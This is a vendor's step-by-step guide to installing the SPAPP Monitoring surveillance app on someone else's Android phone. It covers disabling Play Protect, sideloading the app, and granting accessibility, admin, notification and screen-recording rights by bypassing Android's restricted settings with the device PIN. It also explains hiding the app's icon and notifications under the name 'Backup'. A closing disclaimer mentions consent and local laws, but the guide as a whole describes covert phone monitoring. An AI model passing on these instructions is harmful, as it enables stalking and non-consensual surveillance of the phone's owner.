Install guide on Android 14, 13, 12, 11 and 10

In this step-by-step guide you'll find how to install SPAPP Monitoring on a device with Android 10 and upper, including Android 14.

First of all you need physical access to the target device in order to make next steps.
Secondly, you need to perform 2 preparation steps.

Prepare target device for Spapp Monitoring install:

Spapp Monitoring is Play Protect compatible. However, we still strongly recommend to disable Play Protect BEFORE downloading and installing Spapp Monitoring as it is always updated and some new rules appear.

ATTENTION: Make sure Play Protect is OFF (valid each time you need to install the app on a device):
- Go to Google Play app -> tap on the Google Play user icon to see the menu -> select Play Protect -> Tap on the settings icon and turn off the Scan option and confirm your selection.

Enable your wanted browser app to install apps from unknown sources: - Go to target device's Settings -> Apps -> Special app access -> Install unknown apps -> Find the wanted browser app (for example Chrome) -> switch ON.

Now your preparation steps are done.

NOTEs:
=> Play Protect is recommended to be disabled each time you want to install Spapp Monitoring.
=> Unknown apps settings must be enabled only before the first app install on a device.

1. Go to device's browser:
- Type spappmonitoring.com and enter
- Tap on the download icon and confirm your selection by tapping again on the other download icon.

- Tap on Open
- Tap on Install
- Tap Open again

2. Enable all permissions one by one:

- Confirm your selection for location permission
- Tap again on Accept-Next button and confirm your selection by tapping on OK
- Tap for the third time on Accept-Next button.
NOTE: This repetition is something typical on last Android versions.

4. Now create an account if you install the app for the first time or login if not:
- Insert a REAL, IN USE email address to not lose important information or password reset.
- repeat the email address
- insert a password. Make sure only you know it, you remembers it and it is strong enough
- repeat the password.
NOTE: If you installed the app already previously on the same device then the email address is filled in and you need to write only the password to login (only once).

6. Activate device's admin rights:

7. Enable notification settings:

NOTE: some Android 13 and 14 device have the Backup app grayed so you can not enable it and the message that this is a restricted setting appear. You can enable restricted settings easily either at this install step or just finish the install (as accessibility is also restricted if notification is) and enable them immediately after install.

8. Enable accessibility settings:
- Tap on Accessibility settings
- Find Spapp Monitoring (it is an installed service/app) and tap on it
- Switch ON "Use Spapp Monitoring"
- Confirm your selection by tapping on "Allow"

NOTE: On Android 13 first install and Android 14 every install so far, accessibility is a restricted setting. However, it is very easy to enable it. Here is how:
- If you see the message that this is a restricted setting just tap on OK and exit the menu.
- Go to target device's Setting
- Apps
- Find Backup app and tap on it
- Tap on the 3 dot menu that is on the right upper corner
- Tap "Allow restricted settings"
- Insert device's pin code/pattern and that's it.
Now you can enable accessibility normally. After the pattern, if you did not finish the app set-up you'll be redirected again in app's interface so just continue with the next steps. If your notification access was also a restricted setting then it is enough to allow restricted settings only once.

Here is a video step-by-step guide on how to enable accessibility as restricted settings:

9. Disable app notification (optional):
- Tap on "App notification"
- Switch off for "All Backup notifications"

10. Enable extra settings:
- Tap on "Check warnings"
- Tap on "App usage"
- Find and tap on Backup
- Switch on for "Permit usage access"
- Read the location warning and tap on "Back"
- Tap on "Start now" for recording and casting permission (You need to confirm it each time it will appear).
- Tap exit to finish the app install/set-up and exit the app's interface.

SPAPP Monitoring is installed and ready to start.

After installation tips and tricks

1. How to take the app's icon off the main screen:
Press on the app's icon and move on the left on the first home screen page. Do NOT take the finger off. Now move up to take off the app's icon. That's all.
Here is a video step-by-step guide on how to take off the app's icon from the home screen:

2. How to take off the app's icon from the notifications bar in case you didn't do this during install:
- Go to phone's Settings
- Apps and notifications
- select Backup
- Uncheck the “Show notifications” box
- press on the OK button. From this moment the notification will not be displayed on the phone anymore but the processes will still run in foreground and the app will not be paused or stopped. If you still see the notification you need to restart the app to perform settings updates so will apply the changes: dial #12345678# and click on call -> accept-next -> exit.

NOTE: If you remove app's icon from the home screen and/or notifications bar the app will not become invisible. We remind you that Spapp Monitoring is not invisible or undetectable. When used on adults, written permission may be needed from the target device's user. It must be used legally and responsibly. Please check your local laws and our Terms of service that you agree to if you install Spapp Monitoring.

To check your logs you must login on Spapp Monitoring with the email and password inserted during the install.
